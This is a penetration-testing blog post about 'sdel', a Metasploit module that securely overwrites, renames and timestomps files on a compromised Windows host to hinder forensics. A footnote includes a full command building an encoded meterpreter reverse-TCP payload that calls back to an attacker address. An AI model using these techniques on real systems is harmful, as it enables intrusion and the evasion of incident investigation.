Safe Delete Meterpreter Module

A module has recently been added to Metasploit (master branch) that can be useful for deleting files downloaded to a victim computer through a meterpreter session.

This module, sdel, overwrites the file we want to delete as many times as we choose, with random characters or null bytes (like the Linux shred command). Moreover, before deleting the file, it overwrites its name with a long string (200 bytes) and modifies its MACE attributes (modification, access and creation dates, and the entry in the Master File Table (MFT)) using the API priv.fs.set_file_mace, as shown in its code.

As shown in the image, the newly generated dates correspond to the current date minus N random days.

Code of the change_mace function

It is worth mentioning that on NTFS systems, if the user wants to delete very small files, they could remain in the MFT stream descriptor and thus would not be overwritten. The sdel module alerts the user when the file to be deleted is smaller than 800 bytes. sdel therefore overwrites the file content and the slack space (the "lost" space between the end of the file and the end of the cluster it occupies), but it does not wipe the free space. It is important to keep this in mind because files that use Windows encryption/compression, as well as temporary files, may remain scattered around the disk without being overwritten.

As its description suggests, this module can be very useful when, for instance, during the post-exploitation phase on a victim computer the user needs to download an executable file to perform some action and afterwards delete its contents securely, in order to hinder a potential subsequent forensic analysis.

Using sdel is simple. To overwrite and delete the desired file, the user only has to specify the number of overwriting iterations to perform and the type of overwriting (random or null bytes). These are the module's options:

Module options

Now suppose the following scenario. We have a meterpreter session [1] on a victim machine on which we have used the tool mimikatz (a tool to dump plaintext passwords from Windows or obtain hashes from the SAM, among other features), and we want to delete it after use. We run sdel with three file-overwriting passes:

If we check the file's contents [2] on disk before and after deleting it with sdel, we can see that it has been overwritten properly. The following screenshots show the result before and after deleting a test file (msf.txt) on an NTFS filesystem.

File content on disk BEFORE being deleted by sdel

File content on disk AFTER being deleted by sdel

MFT content BEFORE deleting the file by sdel

MFT content AFTER deleting the file by sdel

As seen in the previous images, both the name and the contents in the MFT have been overwritten.
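As an added example (not the module's code), this Python script reproduces on a constructed toy image the before/after check the screenshots show: a file name stored as UTF-16LE in an MFT-like region and its content in one cluster, the state the steps described above would leave (the whole cluster including slack rewritten with random or null bytes, the name record replaced by 200 random bytes), and a scan for surviving copies of the name and content. The layout, offsets, the 800-byte warning threshold and all function names are assumptions made for the illustration.

```python
import secrets

# Constructed toy layout (not a real NTFS image): an MFT-like region that
# stores the file name as UTF-16LE, the way $FILE_NAME does, followed by one
# cluster holding the file's data and the slack space after it.
MFT_REGION = 1024
CLUSTER = 4096
NAME_OFFSET = 64        # assumed position of the name record in the MFT-like region
RESIDENT_WARN = 800     # sdel warns below this size: data may be MFT-resident


def build_before_image(name: str, data: bytes) -> bytearray:
    """Constructed 'before' state: name in the MFT-like region, data in one cluster."""
    img = bytearray(MFT_REGION + CLUSTER)
    enc = name.encode("utf-16-le")
    img[NAME_OFFSET:NAME_OFFSET + len(enc)] = enc
    img[MFT_REGION:MFT_REGION + len(data)] = data
    return img


def build_after_image(before: bytearray, passes: int = 3, mode: str = "random") -> bytearray:
    """Constructed 'after' state mirroring the steps the post describes: the cluster
    (content plus slack) rewritten `passes` times, name record replaced by 200 random bytes."""
    img = bytearray(before)
    for _ in range(passes):
        fill = secrets.token_bytes(CLUSTER) if mode == "random" else bytes(CLUSTER)
        img[MFT_REGION:MFT_REGION + CLUSTER] = fill
    img[NAME_OFFSET:NAME_OFFSET + 200] = secrets.token_bytes(200)
    return img


def scan_for_remnants(img: bytes, name: str, data: bytes) -> dict:
    """The check WinHex was used for above: offset of every surviving copy of the
    original name (UTF-16LE as in the MFT, and ASCII) and of the original content."""
    hits = {}
    for label, needle in (("name_utf16", name.encode("utf-16-le")),
                          ("name_ascii", name.encode()),
                          ("content", data)):
        off = img.find(needle)
        if off != -1:
            hits[label] = off
    return hits


def resident_warning(size: int) -> bool:
    """Same caveat sdel prints: files under 800 bytes may stay inside the MFT record."""
    return size < RESIDENT_WARN


if __name__ == "__main__":
    content = b"test file content\n" * 60   # constructed sample, larger than 800 bytes
    before = build_before_image("msf.txt", content)
    print("before:", scan_for_remnants(before, "msf.txt", content))
    print("after: ", scan_for_remnants(build_after_image(before), "msf.txt", content))
```

An empty result from the scan after the wipe is what the AFTER screenshots correspond to; a hit in the MFT region for a small file is the resident-data case the module warns about.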

The module was developed by Borja Merino (@borjamerino), a regular author of this blog, and you can use it as long as you are running the latest version of Metasploit.

[1] The tests were performed with a VM running Windows 7 (X.X.X.51) and BackTrack 5 R3 (X.X.X.41), used to generate an executable file (meterpreter.exe) with the payload windows/meterpreter/reverse_tcp, encoded with the shikata_ga_nai algorithm:

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.41 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -o meterpreter.exe

Executing the meterpreter.exe file on the victim machine and using Metasploit, we obtain our reverse shell to connect to the victim computer:

Meterpreter session obtained

[2] The tool used was WinHex.